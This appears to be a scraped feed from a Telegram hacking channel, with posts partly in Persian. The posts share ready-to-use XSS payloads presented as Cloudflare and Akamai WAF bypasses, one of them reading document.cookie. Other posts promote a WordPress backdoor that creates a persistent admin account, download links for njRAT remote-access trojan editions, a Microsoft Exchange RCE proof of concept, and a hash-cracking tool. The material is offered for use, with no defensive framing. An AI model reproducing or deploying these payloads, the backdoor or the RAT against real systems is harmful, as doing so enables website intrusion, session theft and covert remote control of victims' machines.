ابزار Shuck ابزاری برای کرک hash با دیتابیس HIBP
Shuck.sh
#hash
——————
0Day.Today
@LearnExploit
@Tech_Army
Shuck.sh
#hash
——————
0Day.Today
@LearnExploit
@Tech_Army
❤7⚡1👍1🔥1
Advanced XSS Detection Suite
XSStrike is a Cross Site Scripting detection suite equipped with four hand written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
Instead of injecting payloads and checking it works like all the other tools do, XSStrike analyses the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. Here are some examples of the payloads generated by XSStrike:
}]};(confirm)()//\Apart from that, XSStrike has crawling, fuzzing, parameter discovery, WAF detection capabilities as well. It also scans for DOM XSS vulnerabilities.
<A%0aONMouseOvER%0d=%0d[8].find(confirm)>z
</tiTlE/><a%0donpOintErentER%0d=%0d(prompt)``>z
</SCRiPT/><DETAILs/+/onpoINTERenTEr%0a=%0aa=prompt,a()//
Main Features
bugcod3#XSS #Scanner #Exploit #Python
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤2❤🔥1
Xss Bypass Waf
——————
0Day.Today
@LearnExploit
@Tech_Army
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
#bypass #waf ——————
0Day.Today
@LearnExploit
@Tech_Army
👍10👎1
HTTP Parameter Discovery Suite
Arjun can find query parameters for URL endpoints. If you don't get what that means, it's okay, read along.
Web applications use parameters (or queries) to accept user input, take the following example into consideration
http://api.example.com/v1/userinfo?id=751634589This URL seems to load user information for a specific user id, but what if there exists a parameter named
admin
which when set to True
makes the endpoint provide more information about the user?This is what Arjun does, it finds valid HTTP parameters with a huge default dictionary of 25,890 parameter names.
The best part? It takes less than 10 seconds to go through this huge list while making just 50-60 requests to the target. Here's how
GET/POST/POST-JSON/POST-XML
requestsYou can install
arjun
with pip as following:➜ ~
pip3 install arjun
or, by downloading this repository and running➜ ~
python3 setup.py install
BugCod3#Recon #Api #Testing #Fuzzer #Fuzzing
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥4👎1
Forwarded from hr
CVE-2023-36745: Microsoft Exchange Server RCE CVE-2023-36745
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
read
Poc
#cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Daily CyberSecurity
Microsoft Exchange Server RCE (CVE-2023-36745) Flaw Gets PoC Exploit
Proof-of-concept (PoC) exploit code has been published for a Microsoft Exchange Server vulnerability tracked as CVE-2023-36745
👍6⚡2👎1
CloudFlare WAF bypass payload
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥7❤2👍2
An Akamai WAF bypass payload
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9❤1
Reverse Engineering and exploit development
Download
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
Download
#Download
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥8⚡2
بکدور ساخت یوزر ادمین با دسترسی دائم
Link File
#backdoor #wordpress
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
Link File
#backdoor #wordpress
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡11❤2🔥2
Akamai Kona WAF
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤4👍4⚡3🔥1
vless://733297c1-5be1-4595-92c3-d49f8e69a867@s.thisisforu.sbs:43978?alpn=#GR_SV5_MCI_MTN-Telegram%20channel%20%253A%20%2540LearnExploit
بزنید حال کنید بمولا 🔥
20 گیگ زدم تموم شد بازم میفرستم براتون
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥8👍3
telegram phone number checker - This script lets you check whether a specific phone number is connected to a Telegram account.
Github
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - bellingcat/telegram-phone-number-checker: Check if phone numbers are connected to Telegram accounts.
Check if phone numbers are connected to Telegram accounts. - bellingcat/telegram-phone-number-checker
❤🔥3⚡2👍1
🌟 njRAT 🌟
📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.
Use it on virtual machine
⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )
⬇️ Download (ALL Version)
🐈⬛ Github
BugCod3
#njRAT #Tools
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.
Use it on virtual machine
⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )
⬇️ Download (ALL Version)
🐈⬛ Github
BugCod3
#njRAT #Tools
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit 📢 T.me/Tech_Army
👍5❤1🔥1
An Akamai WAF bypass payload
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3👍1
A payload to bypass WAF
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
#WAF #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4